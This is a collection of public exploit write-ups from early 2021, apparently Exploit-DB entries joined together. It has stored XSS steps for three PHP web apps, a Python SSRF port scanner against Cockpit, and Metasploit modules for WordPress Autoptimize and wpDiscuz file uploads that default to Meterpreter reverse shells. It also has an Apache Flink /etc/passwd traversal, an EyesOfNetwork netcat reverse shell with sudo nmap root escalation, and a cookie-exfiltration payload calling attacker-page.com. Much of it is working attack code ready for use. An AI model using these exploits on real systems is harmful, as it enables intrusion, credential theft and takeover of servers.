Click on add new record. Simply put <script>alert(1)</script> and so on in all parameters. Pop up should come up moment you add the record. If not , simply refresh the page, it should come up.
# Exploit Title: Online Doctor Appointment System 1.0 - 'Multiple' Stored XSS
# Tested on: Windows 10
# Exploit Author: Mohamed habib Smidi (Craniums)
# Date: 2021-01-08
# Vendor Homepage: https://www.sourcecodester.com/php/14663/online-doctor-appointment-system-php-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14663&title=Online+Doctor+Appointment+System+in+PHP+with+Full+Source+Code
# Affected Version: Version 1
# CVE : CVE-2021-25791
Step 1: Login to the doctor account in http://TARGET/doctorappointmentsystem/adminlogin.php
Step 2: then Click on the username and go to profile
Step 3: Click on Update profile.
Step 4: Input "<script>alert("craniums")</script>" in the field First Name,Last Name and Address.
Step 5: This Will trigger the payload each time you update or visit a new page.
# Exploit Title: Cockpit Version 234 - Server-Side Request Forgery (Unauthenticated)
# Date: 08.01.2021
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://cockpit-project.org/
# Version: v234
# Tested on: Ubuntu 18.04
#!/usr/bin/python3
import argparse
import requests
import sys
import urllib3
import time
from colorama import Fore, Style
from argparse import ArgumentParser, Namespace
from bs4 import BeautifulSoup
"""
Example scanning for internal server:
python3 PoC.py --target 192.168.1.33:9090 --scan 172.16.16.16 --ports 21,22,23
Example scanning for loopback interface of server:
python3 PoC.py --target 192.168.1.33:9090
Description : https://github.com/passtheticket/vulnerability-research/tree/main/cockpitProject/README.md
"""
def main():
dsc = "Cockpit Version 234 - sshd Service Scanning via Server-Side Request Forgery (Unauthenticated)"
parser: ArgumentParser = argparse.ArgumentParser(description=dsc)
parser.add_argument("--target", help="IP address of Cockpit server", type=str, required=True)
parser.add_argument("--scan", help="IP address of server that will be scanned", type=str, required=False)
parser.add_argument("--ports", help="Ports (example: 21,22)", type=str, required=False)
args: Namespace = parser.parse_args()
if args.target:
target = args.target
if args.scan:
scan = args.scan
if args.ports:
ports = args.ports
else:
ports = "22"
else:
scan = "127.0.0.1"
if args.ports:
ports = args.ports
else:
ports = "22"
cockpitReq(target, scan, ports)
def cockpitReq(target, scan, ports):
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
portRange = ports.split(",")
for unsafe in portRange:
headers = {
"Host": str(target),
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0",
"Accept": "*/*",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Authorization": "Basic dW5zYWZlOmlubGluZQ==",
"X-Authorize": "",
"Connection": "close",
"Cookie": "cockpit=deleted",
}
req = requests.get("http://" + target + "/cockpit+=" + scan + ":" + unsafe + "/login", headers, verify=False)
time.sleep(2)
soup = BeautifulSoup(req.text, 'html.parser')
responseCode = req.status_code
responseTime = str(req.elapsed)
if responseCode == 404:
print("Cockpit server was not found!")
elif responseCode == 401:
if soup.title.string == "Authentication failed":
print(Fore.GREEN + Style.BRIGHT + "[+] Port: "+ unsafe + " sshd service is detected!")
elif soup.title.string == "Authentication failed: no-host":
if responseTime > "0:00:10.000000":
print(Fore.GREEN + Style.BRIGHT +"[-] Port: "+ unsafe + " is open, sshd service is not detected!")
else:
print(Fore.RED + Style.BRIGHT +"[-] Port: "+ unsafe + " sshd service is not detected!")
else:
print(Fore.RED + Style.BRIGHT +"[-] Error is occured!")
print("[-] One bad day!")
sys.exit(1)
else:
print("Something went wrong!")
main()
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HTTP::Wordpress
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(
info,
'Name' => 'Wordpress Autoptimize Authenticated File Upload',
'Description' => %q{
The ao_ccss_import AJAX call does not ensure that the file provided is a legitimate Zip file,
allowing high privilege users to upload arbitrary files, such as PHP, leading to RCE.
},
'Author' =>
[
'Khanh Nguyen - Suncsr Team', # Vulnerability discovery
'Hoa Nguyen - Suncsr Team', # Metasploit module
'Thien Ngo - Suncsr Team' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2020-24948'],
['EDB', '48770'],
['WPVDB', '10372']
],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'DefaultOptions' => {
'PAYLOAD' => 'php/meterpreter/reverse_tcp'
},
'Targets' => [['WP Autoptimize 2.7.6', {}]],
'DefaultTarget' => 0,
'DisclosureDate' => '2020-08-24'))
register_options(
[
OptString.new('USERNAME', [true, 'The WordPress password to authenticate with', nil]),
OptString.new('PASSWORD', [true, 'The WordPress username to authenticate with', nil])
])
end
def check
check_plugin_version_from_readme('autoptimize','2.7.7')
end
def ao_ccss_import_nonce(cookie)
res = send_request_cgi({
'uri' => normalize_uri(wordpress_url_backend,'options-general.php'),
'cookie' => cookie,
'vars_get' => {
'page' => 'ao_critcss'
}
},5)
if res.code == 200
print_good("Found ao_ccss_import_nonce_code Value!")
else
fail_with(Failure::Unknown,'Server did not response in an expected way')
end
ao_ccss_import_nonce_code = res.body.match(/'ao_ccss_import_nonce', '(\w+)/).captures[0]
return ao_ccss_import_nonce_code
end
def exploit
username = datastore['USERNAME']
password = datastore['PASSWORD']
print_status("Trying to login as #{username}")
cookie = wordpress_login(datastore['USERNAME'],datastore['PASSWORD'])
if cookie.nil?
print_error("Unable to login as #{username}")
end
vars = ao_ccss_import_nonce(cookie)
print_status("Trying to upload payload")
filename = "#{rand_text_alpha_lower(8)}.php"
data = Rex::MIME::Message.new
data.add_part('ao_ccss_import', nil, nil, 'form-data; name="action"')
data.add_part(vars, nil, nil, 'form-data; name="ao_ccss_import_nonce"')
data.add_part(payload.encoded, 'application/zip', nil, "form-data; name=\"file\"; filename=\"#{filename}\"")
post_data = data.to_s
print_status("Uploading payload")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(wordpress_url_backend,'admin-ajax.php'),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data,
'cookie' => cookie
})
if res.code == 200
register_files_for_cleanup(filename)
else
fail_with(Failure::Unknown,'Server did not response in an expected way')
end
print_status("Calling uploaded file #{filename}")
send_request_cgi({'uri' => normalize_uri(wordpress_url_wp_content, 'uploads','ao_ccss',filename)},5)
end
end
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(
info,
'Name' => 'Apache Flink File Read Vulnerability',
'Description' => %q{
This module exploits an unauthenticated directory traversal vulnerability
in Apache Flink version 1.11.0 (and released in 1.11.1 and 1.11.2 as well),
allowing arbitrary file read with the web server privileges
},
'Author' =>
[
'0rich1 - Ant Security FG Lab', # Vulnerability discovery
'Hoa Nguyen - Suncsr Team', # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2020-17519'],
['URL', 'http://www.openwall.com/lists/oss-security/2021/01/05/2'],
['URL', 'https://www.tenable.com/cve/CVE-2020-17519']
],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' => [['', {}]],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 05 2021'
))
register_options([
OptInt.new('DEPTH',[true,'Traversal Depth',12]),
OptString.new('FILEPATH',[true,'The path file to read','/etc/passwd'])
])
end
def run_host(ip)
traversal = '..%252f' * datastore['DEPTH']
filename = datastore['FILEPATH'].gsub("/","%252f")
filename = filename[1, filename.length] if filename =~ /^\//
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path,'jobmanager','logs',"#{traversal}#{filename}"),
})
fail_with Failure::Unreachable, 'Connection failed' unless res fail_with Failure::NotVulnerable, 'Connection failed. Nothingn was downloaded' if res.code != 200
fail_with Failure::NotVulnerable, 'Nothing was downloaded. Change the DEPTH parameter' if res.body.length.zero?
print_status('Downloading file...')
print_line("\n#{res.body}\n")
fname = datastore['FILEPATH']
path = store_loot(
'apache.traversal',
'text/plain',
ip,
res.body,
fname
)
print_good("File saved in: #{path}")
end
end
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HTTP::Wordpress
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'WordPress wpDiscuz Unauthen File Upload Vulnerability',
'Description' => %q{
This module exploits an arbitrary file upload in the WordPress wpDiscuz plugin
version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files,
including PHP files, and achieve remote code execution on a vulnerable site’s server.
},
'Author' =>
[
'Chloe Chamberland', # Vulnerability Discovery, initial msf module
'Hoa Nguyen - SunCSR' # Metasploit Module Pull Request
],
'License' => MSF_LICENSE,
'References' =>
[
['WPVDB', '10333'],
['URL', 'https://www.wordfence.com/blog/2020/07/critical-arbitrary-file-upload-vulnerability-patched-in-wpdiscuz-plugin/'],
['URL','https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md'],
['URL','https://plugins.trac.wordpress.org/changeset/2345429/wpdiscuz']
],
'Privileged' => false,
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['wpDiscuz < 7.0.5', {}]],
'DisclosureDate' => 'Feb 21 2020',
'DefaultOptions' =>
{
'PAYLOAD' => 'php/meterpreter/reverse_tcp'
},
'DefaultTarget' => 0))
register_options [
OptString.new('BLOGPATH',[true,'Link to the post [/index.php/2020/12/12/post1]', nil]),
]
end
def check
check_plugin_version_from_readme('wpdiscuz','7.0.5')
end
def blogpath
datastore['BLOGPATH']
end
def find_wmusecurity_id
res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, blogpath)},5)
wmusecurity_id = res.body.match(/wmuSecurity":"(\w+)/).captures
return wmusecurity_id
end
def exploit
wmusecurity_id = find_wmusecurity_id[0]
php_page_name = rand_text_alpha(5 + rand(5)) + '.php'
data = Rex::MIME::Message.new
data.add_part('wmuUploadFiles', nil, nil, 'form-data; name="action"')
data.add_part(wmusecurity_id, nil, nil, 'form-data; name="wmu_nonce"')
data.add_part('undefined', nil, nil, 'form-data; name="wmuAttachmentsData"')
data.add_part('1', nil, nil, 'form-data; name="postId"')
data.add_part('GIF8' + payload.encoded, 'image/gif', nil, "form-data; name=\"wmu_files[0]\"; filename=\"#{php_page_name}\"")
post_data = data.to_s
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path ,'wp-admin', 'admin-ajax.php'),
'method' => 'POST',
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data
)
time = Time.new
year = time.year.to_s
month = "%02d" % time.month
regex = res.body.match(/https?:\\\/\\\/[\w\\\/\-\.:]+\.php/)
wp_shell_upload = /\/\w+-\d+\.\d+\.php/.match(regex.to_s).to_s.tr('/',"")
if res
if res.code == 200 && res.body =~ /#{php_page_name}/
print_good("Payload uploaded as #{php_page_name}")
register_files_for_cleanup(php_page_name)
else
fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
end
else
fail_with(Failure::Unknown, "#{peer} - Server did not answer")
end
print_status("Calling payload...")
send_request_cgi(
{ 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', "#{year}","#{month}",wp_shell_upload)},
5
)
end
end
# Exploit Title: EyesOfNetwork 5.3 - RCE & PrivEsc
# Date: 10/01/2021
# Exploit Author: Audencia Business SCHOOL Red Team
# Vendor Homepage: https://www.eyesofnetwork.com/en
# Software Link: http://download.eyesofnetwork.com/EyesOfNetwork-5.3-x86_64-bin.iso
# Version: 5.3
#Authentified Romote Code Execution flaw > remote shell > PrivEsc
#
#An user with acces to "/autodiscover.php" can execute remote commande, get a reverse shell and root the targeted machine.
==============================================
Initial RCE
In the webpage : https://EyesOfNetwork_IP/lilac/autodiscovery.php
The "target" input is not controled. It's possible tu put any commands after an "&", RCE is possible with a simple netcat commande like :
& nc -e /bin/sh <IP> <PORT>
==============================================
PrivEsc
The EyesOfNetwork apache user can run "nmap" with sudo privilege and with NOPASSWD attribut, so it's possible to become the root user when using classic PrivEsc methode :
echo 'os.execute("/bin/sh")' > /tmp/nmap.script
sudo nmap --script=/tmp/nmap.script
# Exploit Title: Anchor CMS 0.12.7 - 'markdown' Stored Cross-Site Scripting
# Date: 2021-10-01
# Exploit Author: Ramazan Mert GÖKTEN
# Vendor Homepage: anchorcms.com
# Vulnerable Software: https://github.com/anchorcms/anchor-cms/releases/download/0.12.7/anchor-cms-0.12.7-bundled.zip
# Affected Version: [ 0.12.7 ]
# Tested on: Windows 10
# Vulnerable Parameter Type: POST
# Vulnerable Parameter: markdown
# Attack Pattern: <script>prompt("RMG_XSS_PoC")</script>
# Description
Exploitation of vulnerability as shown below;
1-) Entering the Admin Panel ( vulnerableapplication.com/anchor/admin )
2-) Click Create a new post button at the Posts tab ( From "vulnerableapplication.com/anchor/admin/posts " to "vulnerableapplication.com/anchor/admin/posts/add " )
3-) Relevant payload (<script>prompt("RMG_XSS_PoC")</script>) which was defined above entering the markdown parameter then click "save" button
4-) Finally, turn back the home page then shown the triggered vulnerability
# Proof of Concepts:
Request;
POST /anchor/admin/posts/add HTTP/1.1
Host: vulnerableapplication.com
Connection: close
Content-Length: 234
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: https://vulnerableapplication.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://vulnerableapplication.com/anchor/admin/posts/add
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9
Cookie: anchorcms=eokq2ggm8mc4ulg2ii01a92a7d1jqvof7er085tqp9mvmdk2i3h1;
_ga=GA1.2.798164571.1610282526; _gid=GA1.2.1405266792.1610282526; _gat=1
token=uyBOhuKe5lRACERuFGu9CzEqUVe9b6LgfNLFWA6rJJOjG5BPUr2XxZzUV0pMXiQn&title=xss-poc-test&markdown=%3Cscript%3Eprompt(%22RMG_XSS_PoC%22)%3C%2Fscript%3E&slug=xss-poc-test&description=&status=published&category=8&css=&js=&autosave=false
Response;
HTTP/1.1 200 OK
Date: Sun, 10 Jan 2021 12:50:51 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
X-Robots-Tag: noindex,nofollow
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 105
{"id":"3","notification":"Your new article was
created","redirect":"\/anchor\/admin\/posts\/edit\/3"}
# Exploit Title: Cemetry Mapping and Information System 1.0 - Multiple Stored Cross-Site Scripting
# Exploit Author: Mesut Cetin
# Date: 2021-01-10
# Vendor Homepage: https://www.sourcecodester.com/php/12779/cemetery-mapping-and-information-system-using-phpmysqli.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12779&title=Cemetery+Mapping+and+Information+System+Using+PHP%2FMySQLi+with+Source+Code
# Affected Version: 1.0
# Tested on: Kali Linux 2020.4, PHP 7.4.13, mysqlnd 7.4.13, Apache/2.4.46 (Unix), OpenSSL/1.1.1h, mod_perl/2.0.11 Perl/v5.32.0, Burp Suite Professional v.1.7.34
Affected parameter: "full name", "location"
Proof of concept:
1. Login under admin panel, http://localhost/CemeteryMapping/admin/login.php, with default credentials janobe:admin
2. Click on "Deceased Persons"
3. Choose one of the users and click on their names to edit it
4. In the field "Full Name" insert the payload: <script>alert(document.cookie)</script>
5. Save and open the webpage under http://localhost/CemeteryMapping/index.php?q=person
6. You will receive the PHPSESSID cookie as alert. The cookie values can be redirected to attacker page by using payloads like <script src="data:application/javascript,fetch(`https://attacker-page.com/${document.cookie}`)"></script>
To manipulate the "location" parameter, we will use Burp Suite. Capture the request with Burp:
POST /CemeteryMapping/admin/person/controller.php?action=edit HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 149
Origin: http://localhost
Connection: close
Referer: http://localhost/CemeteryMapping/admin/person/index.php?view=edit&id=1
Cookie: PHPSESSID=h9smkdr8dvjhsjviugnvot261m
Upgrade-Insecure-Requests: 1
PEOPLEID=1&GRAVENO=1&FNAME=JACONDIA+A.MORTEL&CATEGORIES=C&BORNDATE=07%2F04%2F1992&DIEDDATE=12%2F29%2F2003&LOCATION=BUENAVISTA+LOOC+CEMETERY<script>alert(document.cookie)</script>&save=
And forward the request. The cookie values will be displayed on screen.